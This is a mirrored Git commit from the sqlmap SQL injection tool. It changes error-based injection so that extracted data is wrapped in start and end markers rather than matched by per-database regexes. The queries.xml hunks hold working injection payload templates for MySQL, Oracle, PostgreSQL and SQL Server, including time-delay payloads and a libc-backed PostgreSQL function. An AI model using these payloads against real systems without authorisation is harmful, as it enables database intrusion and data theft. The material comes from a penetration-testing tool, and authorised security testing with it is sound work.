sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

no more regex. web server independent.

Browse Source
This commit is contained in:
Miroslav Stampar 2010-10-20 09:35:46 +00:00
parent 934adb5e8d
commit 5d3cbec457
4 changed files with 9 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/settings.py
View File

@ -36,6 +36,8 @@ LOGGER.setLevel(logging.WARN)
# error based injection # error based injection
ERROR_SPACE = "%c%c%c" % (58, 95, 58) ERROR_SPACE = "%c%c%c" % (58, 95, 58)
ERROR_EMPTY_CHAR = "%c%c%c" % (58, 120, 58) ERROR_EMPTY_CHAR = "%c%c%c" % (58, 120, 58)
ERROR_START_CHAR = "%c%c%c" % (58, 115, 58)
ERROR_END_CHAR = "%c%c%c" % (58, 101, 58)
# System variables # System variables
IS_WIN = subprocess.mswindows IS_WIN = subprocess.mswindows

3
lib/parse/queriesfile.py
View File

@ -99,9 +99,6 @@ class queriesHandler(ContentHandler):
data = sanitizeStr(attrs.get("query")) data = sanitizeStr(attrs.get("query"))
self.__queries.error = data self.__queries.error = data
data = sanitizeStr(attrs.get("regex"))
self.__queries.errorRegex = data
elif name == "inference": elif name == "inference":
data = sanitizeStr(attrs.get("query")) data = sanitizeStr(attrs.get("query"))
self.__queries.inference = data self.__queries.inference = data

7
lib/techniques/error/use.py
View File

@ -27,6 +27,8 @@ from lib.utils.resume import resume
from lib.core.settings import ERROR_SPACE from lib.core.settings import ERROR_SPACE
from lib.core.settings import ERROR_EMPTY_CHAR from lib.core.settings import ERROR_EMPTY_CHAR
from lib.core.settings import ERROR_START_CHAR
from lib.core.settings import ERROR_END_CHAR
def errorUse(expression, resumeValue=True): def errorUse(expression, resumeValue=True):
""" """
@ -63,15 +65,12 @@ def errorUse(expression, resumeValue=True):
forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped)) forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
result = Request.queryPage(urlencode(forgedPayload), content=True) result = Request.queryPage(urlencode(forgedPayload), content=True)
match = re.search(queries[kb.misc.testedDbms].errorRegex, result[0], re.DOTALL | re.IGNORECASE) match = re.search('%s(?P<result>.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
if match: if match:
output = match.group('result') output = match.group('result')
if output: if output:
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "") output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
if kb.misc.testedDbms == 'MySQL':
output = output[:-1]
if conf.verbose > 0: if conf.verbose > 0:
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True) infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
logger.info(infoMsg) logger.info(infoMsg)

8
xml/queries.xml
View File

@ -24,7 +24,7 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/> <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/> <substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/> <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(CHAR(58),CHAR(115),CHAR(58),(%s),CHAR(58),CHAR(101),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER()"/> <current_user query="SELECT CURRENT_USER()"/>
@ -91,7 +91,7 @@
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/> <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
<substring query="SUBSTR((%s), %d, %d)"/> <substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/> <error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(115)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(58)||CHR(101)||CHR(58)||CHR(62))) FROM DUAL)"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/> <current_user query="SELECT USER FROM DUAL"/>
@ -175,7 +175,7 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/> <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/> <substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/> <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="%s %s=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/> <error query="%s %s=CAST(CHR(58)||CHR(115)||CHR(58)||(%s)::text||CHR(58)||CHR(101)||CHR(58) AS NUMERIC)"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/> <banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/> <current_user query="SELECT CURRENT_USER"/>
@ -242,7 +242,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="%s %s=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/> <error query="%s %s=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(58)+(%s)+CHAR(58)+CHAR(101)+CHAR(58)))"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/> <current_user query="SELECT SYSTEM_USER"/>